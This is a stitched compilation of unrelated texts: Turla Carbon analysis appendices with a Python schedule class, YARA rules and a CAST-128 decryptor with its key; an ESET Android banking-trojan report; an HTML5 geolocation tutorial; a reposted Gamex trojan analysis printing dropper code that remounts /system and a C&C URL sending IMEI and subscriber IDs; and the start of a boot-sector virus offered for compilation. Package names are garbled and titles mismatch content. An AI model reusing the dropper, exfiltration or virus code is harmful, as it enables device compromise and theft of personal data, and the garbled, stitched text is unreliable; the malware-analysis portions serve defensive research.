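        self.wh_min = cp.getint("TIME", "wh_min", fallback=8)
        self.wh_max = cp.getint("TIME", "wh_max", fallback=20)
        self.timestop = parse_systemtime(cp.get("TIME", "timestop", fallback=""))
        self.configlastsend = parse_systemtime(cp.get("TIME", "configlastsend", fallback=""))
        self.lastsend = parse_systemtime(cp.get("LOG", "lastsend", fallback=""))
        self.logperiod = timedelta(seconds=cp.getint("LOG", "logperiod", fallback=7200))

    def in_working_hours(self, t: datetime) -> bool:
        return self.wh_min <= t.hour <= self.wh_max

    def gate_open(self, t: datetime) -> bool:
        """Both threads only run inside the window and, if set, after 'timestop'."""
        if not self.in_working_hours(t):
            return False
        return self.timestop is None or t >= self.timestop

    def advance_into_window(self, t: datetime) -> datetime:
        """Earliest time at or after t that falls inside the working-hour window."""
        if self.in_working_hours(t):
            return t
        start = t.replace(hour=self.wh_min, minute=0, second=0, microsecond=0)
        return start if t < start else start + timedelta(days=1)

    def log_rotation_due(self, now: datetime) -> bool:
        if not self.gate_open(now):
            return False
        return self.lastsend is None or now - self.lastsend >= self.logperiod

    def next_log_rotation(self, now: datetime) -> datetime:
        """First moment from 'now' at which log_rotation_due() becomes true."""
        candidates = [now]
        if self.lastsend is not None:
            candidates.append(self.lastsend + self.logperiod)
        if self.timestop is not None:
            candidates.append(self.timestop)
        return self.advance_into_window(max(candidates))

    def config_backup_due(self, now: datetime) -> bool:
        # Note [8] of the write-up refers to the log-rotation rules for the time range.
        if not self.gate_open(now):
            return False
        return self.configlastsend is None or now - self.configlastsend > timedelta(days=30)


if __name__ == "__main__":
    schedule = CarbonSchedule(SAMPLE_CONFIG)
    now = parse_systemtime("10:3:2017:7:0")
    print("log rotation due now:", schedule.log_rotation_due(now))
    print("next log rotation:", schedule.next_log_rotation(now))
```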

Additional Notes

Calling API functions

The base addresses of the modules of interest are retrieved either by parsing the PEB or (if the modules are not loaded into the process memory) by loading the needed files from disk into memory and parsing their headers to get their base addresses.

Once the base addresses are retrieved, the PEB is walked again and the field “LoadCount” from the structure LDR_DATA_TABLE_ENTRY is checked. This value is used as a reference counter, to track the loading and unloading of a module.

If “LoadCount” is positive, the module EAT is parsed to get the needed function address.

Encryption

The module and function names are encrypted (at least since v3.77; this was not the case in v3.71) in a simple way: a logical shift of 1 bit is applied to each character.

The process names are encrypted as well, by XOR'ing each character with the key 0x55 (for Carbon v3.7x, at least since v3.77) and with the key 0x77 for Carbon v3.8x.

With only a few exceptions, each file in the Carbon working directory is encrypted with the CAST-128 algorithm in OFB mode. The same key and IV are used from version 3.71 up to version 3.81:

  • key = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0\xFE\xFC\xBA\x98\x76\x54\x32\x10”
  • IV = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0”

Check if packet capture is running

Before communicating with the C&C server or with other computers, the malware ensures that none of the most common packet capture software is running on the system:

  • TCPdump.exe
  • windump.exe
  • ethereal.exe
  • wireshark.exe
  • ettercap.exe
  • snoop.exe
  • dsniff.exe

If any of these processes are running, no communication will be done.

Carbon IoCs are also available on ESET’s GitHub repository: https://github.com/eset/malware-ioc/tree/master/turla

Appendices

Yara rules

import "pe"

rule generic_carbon
{
    strings:
        $s1 = "ModStart"
        $s2 = "ModuleStart"
        $t1 = "STOP|OK"
        $t2 = "STOP|KILL"
    condition:
        (uint16(0) == 0x5a4d) and (1 of ($s*)) and (1 of ($t*))
}

rule carbon_metadata
{
    condition:
        (pe.version_info["InternalName"] contains "SERVICE.EXE" or
         pe.version_info["InternalName"] contains "MSIMGHLP.DLL" or
         pe.version_info["InternalName"] contains "MSXIML.DLL")
        and pe.version_info["CompanyName"] contains "Microsoft Corporation"
}

Carbon files decryptor/encryptor

carbon_tool.py

#!/usr/bin/env python2

from Crypto.Cipher import CAST
import sys
import argparse

def main():

    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument("-e", "--encrypt", help="encrypt carbon file", required=False)
    parser.add_argument("-d", "--decrypt", help="decrypt carbon file", required=False)

    try:
        args = parser.parse_args()
    except IOError as e:
        parser.error(e)
        return 0

    if len(sys.argv) != 3:
        parser.print_help()
        return 0

    # CAST-128 key and IV shared by Carbon v3.71 through v3.81 (see "Encryption")
    key = "\x12\x34\x56\x78\x9A\xBC\xDE\xF0\xFE\xFC\xBA\x98\x76\x54\x32\x10"
    iv = "\x12\x34\x56\x78\x9A\xBC\xDE\xF0"

    cipher = CAST.new(key, CAST.MODE_OFB, iv)

    if args.encrypt:
        plaintext = open(args.encrypt, "rb").read()
        # pad with NUL bytes up to the 8-byte block size
        while len(plaintext) % 8 != 0:
            plaintext += "\x00"
        data = cipher.encrypt(plaintext)
        open(args.encrypt + "_encrypted", "wb").write(data)
    else:
        ciphertext = open(args.decrypt, "rb").read()
        while len(ciphertext) % 8 != 0:
            ciphertext += "\x00"
        data = cipher.decrypt(ciphertext)
        open(args.decrypt + "_decrypted", "wb").write(data)

if __name__ == "__main__":
    main()

Open Source documentation

Carbon footprint

Table 2 – Carbon sample hashes
Table 3 – C&C server addresses (hacked websites used as the 1st level of proxies)
Notes
5. two hours by default, but the waiting time depends on the value of the field “logperiod” in the “LOG” section of the configuration file
6. see the “Tasks execution” part for more details
7. see the “Orchestrator / Tasks execution” part for more details
8. depending on the configuration file; see “Log rotation” for the details

Released Android malware source code used to run a banking botnet

A new Android banking malware that ESET recently discovered on Google Play has turned up again in the wild, this time targeting more banks. Further investigation of this threat revealed that its code was built from source code that was made public a few months ago.

The earlier version, detected by ESET as Trojan.Android/Spy.Banker.HU (version 1.1, as labeled by the author of the source code), was reported on February 6th. The malware was distributed through Google Play as a trojanized version of a legitimate weather forecast application, Good Weather. The trojan targeted 22 Turkish mobile banking applications, attempting to harvest credentials using fake login forms. In addition, it could remotely lock and unlock infected devices and intercept SMS messages.

Last Sunday, we found a new version of the trojan on Google Play, disguised as another legitimate weather application, this time World Weather. The trojan, detected by ESET as Trojan.Android/Spy.Banker.HW (version 1.2), was available on the Google Play store from February 14th until it was reported by ESET and pulled from the store on February 20th.

Connecting the dots

The second discovery led to another round of investigation, which provided some interesting revelations.

It turns out that these trojans are based on freely available Android trojan source code published online. The Android malware “template” code, allegedly written from scratch, together with the C&C server code, including a web control panel, has been available on a Russian forum since December 19th, 2016.

Figure 1 – Source code of the Android malware and C&C published on a Russian forum

The subsequent investigation brought the findings of Dr.Web to our attention: they had analyzed an earlier variant of the malware (detected by our systems since December 26th, 2016, as Android/Spy.Banker.HH).

However, this variant is not directly connected to the ones we found on Google Play, even though we detect it under the same detection name, as version 1. We were able to confirm this after gaining access to the botnet's C&C server control panel, which was up and running at the time of our investigation. Through the control panel, we were able to gather information about all 2,800 bots infected by this version of the malware.

Figure 2 – C&C web control panel listing the malware's victims

Below is an overview of the user base affected by the malware, based on the botnet data listed in the C&C control panel:

Interestingly, the C&C server itself, active since February 2nd, 2017, was accessible to anyone who had the URL, without any credentials.

Figure 3 – Investigation timeline

How does it operate?

The newly discovered version has essentially the same functionality as its predecessor. On top of the weather forecast functionality taken from the original legitimate application, Trojan.Android/Spy.Banker.HW is able to remotely lock and unlock infected devices by setting a lock-screen password, and to intercept SMS messages.

The only differences between the two appear to be a broader target group, with the malware now affecting users of 69 banking applications in the UK, Austria, Germany and Turkey, and more advanced obfuscation techniques.

Figure 4 – Malicious app on Google Play

Figure 5 – Green: legitimate World Weather icon; red: malicious version

The trojan also has a built-in notification feature, whose purpose we could only verify after gaining access to the C&C server. It turns out the malware is able to display fake notifications on the infected device, prompting the user to launch one of the targeted banking applications under the pretext of an “important message” from that bank. Doing so triggers the malicious activity in the form of a fake login screen.

Figure 6 – C&C sending a fake notification message to an infected device

Figure 7 – Fake banking application notification sent from the C&C

Is my device infected? How do I clean it?

If you have recently installed a weather application from the Play store, you may want to check whether you have fallen victim to this banking trojan.

In case you think you might have downloaded an app named Weather, look for it under Settings -> Application Manager. If you see the app depicted in Fig. 8, and also find “System update” under Settings -> Security -> Device administrators (Fig. 9), your device has been infected.

To clean your device, we recommend that you use a mobile security solution, or you can remove the malware manually.

To manually uninstall the trojan, it is first necessary to deactivate its device administrator rights, found under Settings -> Security -> System update. With that done, you can uninstall the malicious app in Settings -> Application Manager -> Weather.

Figure 8: The trojan in the Application Manager

Figure 9: The malware disguised as an active device administrator named “System update”

How to stay safe

While the particular group of attackers behind this botnet chose to spread the malware through trojanized weather apps and to target the banks listed at the bottom of this article, there is no guarantee that the code is not, or will not be, used elsewhere.

Keep in mind that sticking to a few basic principles goes a long way toward protecting yourself against mobile malware.

Although not flawless, Google Play does employ advanced security mechanisms to keep malware out. This may not be the case with other app stores or other unknown sources, so choose the official Google Play store whenever possible.

When downloading from the Play store, make sure you check the permissions an app requests when installing or updating. Rather than automatically granting an app the permissions it asks for, consider what they mean for the app and for your device. If anything seems off, read what other users wrote in their reviews and download accordingly.

After running the apps you have installed on your mobile device, keep paying attention to the permissions and rights they request. An app that will not run without advanced permissions unrelated to its intended functionality may be an app you do not want installed on your phone.

Last but not least, even if all other measures fail, a reputable mobile security solution can protect your device from active threats.

If you want to learn more about Android malware, take a look at our latest research on the topic.

You can also stop by ESET's stand at this year's Mobile World Congress.

Samples

Package name | SHA-1 | Detection
goodish.weather | ca2250a787fac7c6eef6158ef48a3b6d52c6bc4b | Android/Spy.Banker.HH
goodish.weather | a69c9bad3db04d106d92fd82ef4503ea012d0da9 | Android/Spy.Banker.HU
follon.weather | f533761a3a67c95dc6733b92b838380695ed1e92 | Android/Spy.Banker.HW

Targeted applications

Android/Spy.Banker.HH and Android/Spy.Banker.HU:

com.garanti.cepsubesi
com.garanti.cepbank
com.pozitron.iscep
com.softtech.isbankasi
com.teb
com.akbank.android.apps.akbank _直接
com.akbank.softotp
com.akbank.android.apps.akbank _直接_片剂
com.ykb.androidtablet
com.ykb.android.mobilonay
com.finansbank.mobile.cepsube
finansbank.enpara
com.tmobtech.halkbank
biz.mobinex.android.apps.cep_sifrematik
com.vakifbank.mobile
com.ingbanktr.ingmobil
com.tmob.denizbank
tr.com.sekerbilisim.mbank
com.ziraat.ziraatmobil
com.intertech.mobilemoneytransfer.activity
com.kuveytturk.mobil
com.magiclick.odeabank

Android/Spy.Banker.HW:

com.garanti.cepsubesi
com.garanti.cepbank
com.pozitron.iscep
com.softtech.isbankasi
com.teb
com.akbank.android.apps.akbank _直接
com.akbank.softotp
com.akbank.android.apps.akbank _直接_片剂
com.ykb.android
com.ykb.androidtablet
com.ykb.android.mobilonay
com.finansbank.mobile.cepsube
finansbank.enpara
com.tmobtech.halkbank
biz.mobinex.android.apps.cep_sifrematik
com.vakifbank.mobile
com.ingbanktr.ingmobil
com.tmob.denizbank
tr.com.sekerbilisim.mbank
com.ziraat.ziraatmobil
com.intertech.mobilemoneytransfer.activity
com.kuveytturk.mobil
com.magiclick.odeabank
com.isis _ papyrus.raiffeisen _付费的_ eyewdg
at.spardat.netbanking
at.bawag.mbanking
at.volksbank.volksbankmobile
com.bankaustria.android.olb
at.easybank.mbanking
com.starfinanz.smob.android.sfinanzstatus
com.starfinanz.smob.android.sbanking
de.fiducia.smartphone.android.banking.vr
com.db.mm.deutschebank
de.postbank.finanzassistent
de.commerzbanking.mobil
com.ing.diba.mbbr2
de.ing_diba.kontostand
de.dkb.portalapp
com.starfinanz.mobile.android.dkbpushtan
de.consorsbank
de.comdirect.android
mobile.santander.de
de.adesso.mobile.android.gad
com.grppl.android.shell.bos
uk.co.bankofscotland.businessbank
com.barclays.android.barclaysmobilebanking
com.barclays.bca
com.ie.capitalone.uk
com.monitise.client.android.clydesdale
com.monitise.coop
uk.co.northernbank.android.tribank
com.firstdirect.bankingonthego
com.grppl.android.shell.halifax
com.htsu.hsbcpersonalbanking
com.hsbc.hsbcukcmb
com.grppl.android.shell.cmblloydstsb73
com.lloydsbank.businessmobile
uk.co.metrobankonline.personal.mobile
co.uk.nationwide.mobile
com.rbs.mobile.android.natwest
com.rbs.mobile.android.natwestbandc
com.rbs.mobile.android.rbsm
com.rbs.mobile.android.rbsbandc
uk.co.santander.santanderuk
uk.co.santander.businessuk.bb
com.tescobank.mobile
uk.co.tsb.mobilebank
com.rbs.mobile.android.ubn
com.monitise.client.android.yorkshire

Basic methods of HTML5 geolocation (China Hacker Cloud platform)

Geolocation is one of the important features of HTML5. It provides a way to determine the user's location, and with it you can build location-based applications. This article introduces the basic principles of HTML5 geolocation and the accuracy of the data returned by the various browsers.

Before accessing location information, the browser asks the user whether to share it. Taking Chrome as an example: if you allow Chrome to share your location with a website, Chrome sends local network information to the Google location service to estimate where you are, and then shares that location with the website that requested it.

The HTML5 Geolocation API is very simple to use; the basic call looks like this:
if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(locationSuccess, locationError, {
        // ask the browser for a high-accuracy position; defaults to false
        enableHighAccuracy: true,
        // timeout for obtaining the position, in milliseconds; unlimited by default
        timeout: 5000,
        // maximum age of a cached position; when polling, controls how soon a fresh fix is requested
        maximumAge: 3000
    });
} else {
    alert("Your browser does not support Geolocation!");
}
locationError is the callback invoked when retrieving the location fails; it can show a message according to the error type (showError is the page's own message helper):

function locationError(error) {
    switch (error.code) {
        case error.TIMEOUT:
            showError("A timeout occurred! Please try again!");
            break;
        case error.POSITION_UNAVAILABLE:
            showError("We can't detect your location. Sorry!");
            break;
        case error.PERMISSION_DENIED:
            showError("Please allow geolocation access for this to work.");
            break;
        case error.UNKNOWN_ERROR:
            showError("An unknown error occurred!");
            break;
    }
}
locationSuccess is the callback invoked on success; the returned data includes latitude and longitude, which combined with the Google Maps API can display the user's current position on a map:

function locationSuccess(position) {
    var coords = position.coords;
    var latlng = new google.maps.LatLng(
        // latitude
        coords.latitude,
        // longitude
        coords.longitude
    );
    var myOptions = {
        // map zoom level
        zoom: 12,
        // center the map on the given coordinates
        center: latlng,
        // map type
        mapTypeId: google.maps.MapTypeId.ROADMAP
    };
    // create the map and render it into the page
    var myMap = new google.maps.Map(
        document.getElementById("map"), myOptions
    );
    // create a marker
    var marker = new google.maps.Marker({
        // place the marker at the given coordinates
        position: latlng,
        // the map the marker belongs to
        map: myMap
    });
    // create an info window
    var infowindow = new google.maps.InfoWindow({
        content: "You are here<br/>Latitude: " +
            coords.latitude +
            "<br/>Longitude: " + coords.longitude
    });
    // open the info window
    infowindow.open(myMap, marker);
}
In testing, the location information obtained by Chrome, Firefox, Safari and Opera was exactly the same, presumably because they all use the same location service; the data is as follows:

IE, on the other hand, returned data different from the browsers above:

The local network information used by the location service to estimate your position includes: information about visible WiFi access points (including signal strength), information about your local router, and your computer's IP address. The accuracy and coverage of the location service vary by location.

Overall, the location accuracy obtained through HTML5 geolocation in desktop browsers is not very high: it is more than enough for a city-level weather forecast built on this feature, but the error is still too large for a map application. On mobile devices, however, an HTML5 application can set the enableHighAccuracy parameter to true to use the device's GPS and obtain high-accuracy location information.

[Repost] Android trojan remote control 1.3 (complete AV-evading process-implant edition)

Tools

ApkTool, dex2jar and DJ Java Decompiler are essential for the analysis

Python 2.6 for writing the decryption script

Analysis

This sample infects the device by being bundled with the software SD-Booster: when the infected SD-Booster is installed and run, the trojan is automatically installed into the Android system. To find the infected part quickly, I downloaded a clean SD-Booster, decompiled it and compared the two; the result is shown in Figure 1:

Figure 1

Two packages, “com.android.md5” and “com.gamex.inset”, were implanted into the program. First, locate where the implant is loaded: the following code was inserted into the onCreate() method of the SDBoost class:

public void onCreate(Bundle paramBundle) {
    super.onCreate(paramBundle);
    A.b(this);
    …

A is a class in the “com.gamex.inset” package; the code of A.b() is:

public static void b(Context paramContext)
{
    context = paramContext;
    Intent localIntent = new Intent(paramContext, Settings.class);
    ComponentName localComponentName = paramContext.startService(localIntent);
}

It directly starts the Settings.class service. This service is very simple; its startup code is:

public void onStart(Intent paramIntent, int paramInt)
{
    super.onStart(paramIntent, paramInt);
    new Settings.1(this).start();
}

class Settings$1 extends Thread
{
    public void run()
    {
        if ((!A.a) && (A.c()) && (A.d(A.context)))
        {
            A.a = 1;
            Settings localSettings = this.this$0;
            new C(localSettings).start();
        }
        while (true)
        {
            return;
            this.this$0.stopSelf();
        }
    }
}

A.a is initialized to 0 and is used to tell whether the trojan is already running. A.c() is a single line that checks whether the SD card is ready, in preparation for the later payload download. A.d() checks whether the trojan program “com.android.setting” is already installed; if it is not and the conditions above are met, thread C is started to install the trojan. The run() method of class C does not show up in dex2jar, but the complete decompiled code can be seen in DJ Java Decompiler: the thread reads the trojan file via context.getAssets().open(“logos.png”) and then decrypts it to obtain the final APK installation file. I implemented the decryption in Python as follows:

# -*- coding:utf-8 -*-
# Python 2 (the post uses 2.6): decrypt_apk.py <asset file>
import sys

def main(filename):
    infile = file(filename, "rb")
    outfile = file(filename[:-4] + ".apk", "wb")
    while 1:
        c = infile.read(1)
        if not c:
            break
        c = chr(ord(c) ^ 18)  # every byte is XORed with 0x12
        outfile.write(c)
    outfile.close()
    infile.close()

if __name__ == '__main__':
    main(sys.argv[1])
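The author's script above needs the key (0x12) known in advance. As an added triage example that is not part of the original post, the following Python 3 helper brute-forces a single-byte XOR key over every file under assets/ and flags those whose decoded bytes start with a ZIP (APK) or DEX header, which is how a defender would screen a suspicious app for an embedded payload like logos.png; the dropper it builds for itself is constructed test data, not the real sample.

```python
# Added example, not from the original post: screen an APK's assets/ for a
# payload hidden behind a single-byte XOR, as Gamex hides its APK in logos.png.
import io
import os
import tempfile
import zipfile

# Headers a dropped payload shows once the XOR is undone.
MAGICS = {b"PK\x03\x04": "zip/apk", b"dex\n": "dex"}

def xor_bytes(data, key):
    """XOR every byte with key; the dropper's decrypt and our encode are the same op."""
    return bytes(b ^ key for b in data)

def find_xor_payload(data):
    """Brute-force the key: (key, kind) when the decoded head starts with a ZIP
    or DEX magic, else None. Key 0 means the payload is stored in clear."""
    head = data[:8]
    for key in range(256):
        decoded = xor_bytes(head, key)
        for magic, kind in MAGICS.items():
            if decoded.startswith(magic):
                return key, kind
    return None

def scan_apk_assets(apk_path):
    """Return [(asset name, key, kind)] for each asset that decodes to a payload."""
    hits = []
    with zipfile.ZipFile(apk_path) as z:
        for name in z.namelist():
            if not name.startswith("assets/") or name.endswith("/"):
                continue
            data = z.read(name)
            found = find_xor_payload(data)
            if found is not None:
                hits.append((name,) + found)
    return hits

def build_sample_dropper(key=0x12):
    """Constructed test data (not the real sample): assets/logos.png is an inner
    zip XOR-ed with key, beside a genuine PNG header that must not be flagged."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("classes.dex", b"dex\n035\x00constructed")
    fd, path = tempfile.mkstemp(suffix=".apk")
    os.close(fd)
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("assets/logos.png", xor_bytes(inner.getvalue(), key))
        z.writestr("assets/real.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    return path
```

A hit with key 0 is an unobfuscated archive and may be legitimate; a non-zero key on an "image" asset is the Gamex pattern and deserves a closer look.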

The decryption is nothing more than XORing the whole file with 0x12; running "python decrypt_apk.py logos.png" produces the trojan file logos.apk. After the decryption in the previous step completes, the a(String) method is called to install the trojan; its code is:

protected static void a(String paramString)
  {
    try
    {
      Process localProcess = Runtime.getRuntime().exec("su");
      OutputStream localOutputStream = localProcess.getOutputStream();
      DataOutputStream localDataOutputStream = new DataOutputStream(localOutputStream);
      localDataOutputStream.writeBytes("mount -o remount rw /system \n");
      String str = "cp -i " + paramString + " /system/app/ComAndroidSetting.apk\n";
      localDataOutputStream.writeBytes(str);
      Thread.sleep(20000L);
      localDataOutputStream.writeBytes("chmod 644 /system/app/ComAndroidSetting.apk\n");
      localDataOutputStream.writeBytes("exit\n");
      localDataOutputStream.flush();
      int i = localProcess.waitFor();
      return;
    }
    catch (IOException localIOException)
    {
      while (true)
        localIOException.printStackTrace();
    }
    catch (InterruptedException localInterruptedException)
    {
      while (true)
        localInterruptedException.printStackTrace();
    }
  }

This malicious code copies the whole program into "/system/app/", turning it into a system app! Once the installation is done, it runs the following code to send a broadcast and stop the Settings service:

        Intent intent = new Intent("kurhjfngjhfjghdfjgjjdh");
        context.sendBroadcast(intent);
        Intent intent1 = new Intent(context, com/android/md5/Settings);
        boolean flag3 = context1.stopService(intent1);

The broadcast with this strange string is meant to be received by the trojan. With that, the bundling part's work is done and the trojan proper comes on stage. Unpack the logos.apk decrypted just now, run it through dex2jar and the usual steps, and a look at "AndroidManifest.xml" shows that the trojan has no UI and is run via two boot broadcasts, as shown in Figure 2:

 

Figure 2

This also confirms the analysis of SDBoost sending the strange-string broadcast. The code of the first broadcast receiver is:

public class B extends BroadcastReceiver
{
  public static final String q = "android.intent.action.BOOT_COMPLETED";
  public static final String qx = "kurhjfngjhfjghdfjgjjdh";
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    if ((paramIntent.getAction().equals("android.intent.action.BOOT_COMPLETED")) || (paramIntent.getAction().equals("kurhjfngjhfjghdfjgjjdh")))
      A.b(paramContext);
  }
}

This A.b() method starts the Settings.class service, and the service starts a thread; its skeleton is similar to the thread analyzed earlier:

public void run()
  {
    try
    {
      this.this$0.d();
      sleep(30000L);
      if ((!A.a) && (A.c()) && (A.d(this.this$0)))
      {
        A.a = 1;
        Settings localSettings1 = this.this$0;
        new E(localSettings1).start();
        return;
      }
    }
    catch (InterruptedException localInterruptedException)
    {
      …
    }
  }

d() is responsible for decoding the C&C (command and control) server address and sending the phone's private information. The decoding code is the getUrl() method of Settings; implemented in Python, the decoding is:

# -*- coding:utf-8 -*-
# Python 2 (the post uses 2.6): decrypt_url.py <asset file>
import sys

def decrypt2url(decryptedfile):
    f = file(decryptedfile, "r")
    buf = f.read()
    f.close()
    bs = map(ord, buf)  # store the byte stream as a list of decimal values
    sizz = len(bs)
    for i in range(0, sizz, 2):  # swap trailing bytes with leading ones
        if i >= sizz / 2: break
        d = bs[i]
        bs[i] = bs[sizz - 1 - i]
        bs[sizz - 1 - i] = d
    ss = ''.join(map(chr, bs))
    bs2 = ss.split(',')  # split on the commas
    bss = list(bs2)
    sout = ''
    for i in range(0, len(bss), 2):  # only the even positions form the URL
        sout = sout + chr(int(bss[i]))
    print sout

def main(filename):
    PASS = ''.join(chr(x) for x in [9, 5, 9, 8, 5])  # the key bytes of the decryption
    infile = file(filename, "rb")
    outfile = file(filename[:-4] + ".txt", "wb")
    i = 0
    while 1:
        c = infile.read(1)
        if not c:
            break
        j = i % 5
        d = PASS[j]
        c = chr(ord(c) ^ ord(d))
        i = i + 1
        outfile.write(c)
    outfile.close()
    infile.close()
    decrypt2url(filename[:-4] + ".txt")

if __name__ == '__main__':
    main(sys.argv[1])

This decryption script first XORs every byte of the "logo.png" file with the key bytes [9, 5, 9, 8, 5]; the decrypted content is shown in Figure 3:

 

Figure 3

With this string in hand, reverse it end to end once; after the rearrangement, each comma-separated number is the ASCII code of one character, and taking the even-indexed values yields the final URL. For those who use Java, I also implemented the decryption in Java and packed it into the attachment. The decrypted result is shown in Figure 4:

 

Figure 4

Accessing this URL directly only returns a "forbidden" message. In the d() method, the results of getDeviceId(), getSubscriberId(), Build.MODEL and getApplicationInfo(str3, 128).metaData.getString("CMP_PID") are combined with other strings to form the final URL "http://www.fineandroid.com/inputex/index.php?s=/Interface/keinter/a1/DeviceId/a2/SubscriberId/a3/MODEL/index/xian1234"; finally the b(String) method is called to start a thread that sends the information out. The code is:

public void run()
  {
    …
    HttpGet localHttpGet = new HttpGet(str);
    try
    {
      HttpResponse localHttpResponse = new DefaultHttpClient().execute(localHttpGet);
      if ((localHttpResponse.getStatusLine().getStatusCode() == 200) && (EntityUtils.toString(localHttpResponse.getEntity()).equals("1")))
      {
        SharedPreferences.Editor localEditor1 = this.this$0.getSharedPreferences("tijiao", 0).edit();
        SharedPreferences.Editor localEditor2 = localEditor1.putInt("biaoji", 1);
        boolean bool = localEditor1.commit();
      }
      return;
    }
    catch (ClientProtocolException localClientProtocolException)
    {
      …
    }
     …
  }

If the submission succeeds, a flag is saved in SharedPreferences. Building the string and accessing it manually gives the result shown in Figure 5:

 

Figure 5

Back to the Settings.1 thread: after finishing this work it starts checking again. A.a tells whether the trojan is already running, A.c() checks whether the SD card is ready, and A.d(Context) checks whether the trojan package "com.android.update" is installed. If it is not installed and the conditions above hold, an E thread is started to do the work. On startup, the E thread registers two broadcast receivers, for "android.intent.action.PACKAGE_ADDED" and "android.intent.action.PACKAGE_CHANGED"; the receiver starts the Settings.class service when it receives the Intent("akjgikurhnfjghfkj") broadcast. After that, the thread runs and decodes the "com.android.update" trojan package in the same way as the "com.android.setting" code above, so the earlier "decrypt_apk.py" script recovers the trojan APK file. Once decoded, the a() method is called to install the "com.android.update" trojan. With that, the trojan installation and information sending triggered by the class B boot receiver are complete. Now look at the other boot receiver, class D: its code is very simple. On receiving the broadcast it gets the trojan's package name and, in its a() method, calls "pm install -r" to reinstall the trojan. That concludes the "com.android.setting" trojan; next let's look at "com.android.update", which is also the core part of the Gamex trojan.

The core of the "com.android.update" trojan is started by the boot broadcast, as shown in Figure 6:

 

Figure 6

The broadcast receiver's code is:

public class B extends BroadcastReceiver
{
  public static final String a = "akjgikurhnfjghfkj";
  public static final String q = "android.intent.action.BOOT_COMPLETED";
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    if ((paramIntent.getAction().equals("android.intent.action.BOOT_COMPLETED")) || (paramIntent.getAction().equals("akjgikurhnfjghfkj")))
      A.boot(paramContext);
  }
}

After receiving the broadcast, the boot() method of class A starts the Updater.class service. This service creates four objects that carry out all of the trojan's work; the code is:

public void onStart(Intent paramIntent, int paramInt)
  {
    super.onStart(paramIntent, paramInt);
    D localD = new D(this);
    this.activityThread = localD;
    F localF = new F(this);
    this.getSoftThread = localF;
    G localG = new G(this);
    this.downSoftThread = localG;
    H localH = new H(this);
    this.installSoftThread = localH;
  }

The four objects have a clear division of labor; let's take them one at a time. The first object, D, is the "sentry", in charge of "reporting back". On construction it registers the broadcast receiver D.1, which listens for "android.intent.action.SCREEN_OFF" and "android.intent.action.SCREEN_ON". When the latter fires, it launches HOME to hide itself; when the former fires, it quietly collects information about the software the user has installed. The steps: D.1 first calls the d() method of D's M member to query for trojan apps that are installed but not yet running (M is D's database-query object, created when D is initialized); then it calls D.f() to get the running software and compares it with the list returned by M.d(). If a program that is not running is found, it uses localPackageManager.getLaunchIntentForPackage(String) to get the Activity name and calls paramContext.startActivity(localIntent1) to launch that program, then calls M.j(String) to update the software-state database, and finally calls D.n(String) to send information to the C&C server. The code is:

public void n(String paramString)
  {
    String str1 = ((TelephonyManager)this.g.getSystemService("phone")).getDeviceId(); // get the IMEI
    if (str1 == null)
      str1 = "";
    String str2 = String.valueOf(j());
    String str3 = String.valueOf(str2 + "inputex/index.php?s=/Interface/neiinter/a1/");
    String str4 = str3 + str1 + "/nam/" + paramString;
    j(str4);
  }

The j() method decrypts the "icon.png" file in the Assets directory to obtain the C&C address; decrypt_url.py can be used for it as well, and the decrypted address is again "http://www.fineandroid.com/". After the URL is assembled, j(String) sends it out, in the same way as in "com.android.android". With that, object D is understood; next is object F. F is also simple: it reads the trojan list from the trojan server and writes it into the local database for the trojan to query. F.k() decodes to the address "http://fineandroid.com/InstallApk/php4sam.php"; accessing it directly gives Figure 7:

 

Figure 7

The trojan's author is Chinese, no doubt about it. Parsing the whole HTML content is done by J.a(InputStream); for reasons of space it is not shown here. The resulting List data is inserted into the database via M.g(String, …), and F.e(String) applies a simple encryption before saving, which I won't analyze. Now the third class, G, which is responsible for downloading the trojans. Its core method is loop(): it first calls M.C() to check for trojan software that has not been downloaded yet; if there is some, it checks whether the device is on Wi-Fi, and if all conditions are met it creates a P object, which calls K.d(String, …) to start the download; when the download finishes, M.h() records the trojan's download state. After all of this the thread goes to sleep: 1 minute on Wi-Fi, 5 hours off Wi-Fi. The corresponding code is:

protected void loop()
  {
    NetworkInfo localNetworkInfo = ((ConnectivityManager)this.e.getSystemService("connectivity")).getActiveNetworkInfo();
    List localList;
    if ((localNetworkInfo != null) && (localNetworkInfo.isAvailable()) && (!this.d))
    {
      localList = this.h.c();
      if (localList.size() == 0)
        setSleepTime(60000L);  // nothing to download: sleep 1 minute
    }
    while (true)
    {
      return;
      if (localNetworkInfo.getTypeName().equals("WIFI")) // on a WIFI network?
      {
        localIterator = localList.iterator();
        if (!localIterator.hasNext())
          continue;
        …
        Handler localHandler1 = this.f;
        new P(localContext1, str1, str2, "download/", str3, localHandler1).start(); // start the download
        this.d = 1;
        setSleepTime(60000L);  // sleep 1 minute after the download
        continue;
      }
      …
      new P(localContext2, str4, str5, "download/", str6, localHandler2).start(); // start the download
      this.d = 1;
      setSleepTime(18000000L); // sleep 5 hours
      …
    }
  }

The last class, H, is the installer class; it does no real work, only sending a broadcast every so often and updating the state of downloaded trojan software in the database. With that, the analysis of the whole Gamex trojan is complete.

Summary

The analysis of the Gamex trojan has shown a lot of code for bundling, silent software installation, URL submission and response handling, boot broadcasts, and file encryption and decryption. All of this is common in an Android programmer's daily coding; only by mastering the Android fundamentals and keeping a clear line of analysis can one see through an Android trojan. Finally, here is a flowchart of Gamex to help with understanding.

中国骇客云 (China Hacker Cloud) boot sector virus sample routine C; the viruses on this site can be downloaded and compiled ~ produced by 中国寒龙

Boot sector virus sample
; Build: tasm boot.asm; tlink boot.asm;
; produces boot.exe; run it
.286
.model small
.code
; Entry parameters
; ax = high memory address  bx = 7c00h, start address of the boot program
; cx = 0001h means this program was read from track ch(00) sector cl(01)
; dx = 00/80h means this program was read from drive dx (00: A:) (80: C:)
; ds = es = ss = cs = 0, initial segment values
OFF equ
VirusSize=OFF @@End-OFF @@Start
@@Start:
jmp short @@Begin
VirusFlag db 'V' ; virus marker
@@BootData: ; two important data structures live here, must not be code
org 50h ; the virus begins at offset 50h; it does not use the data above,
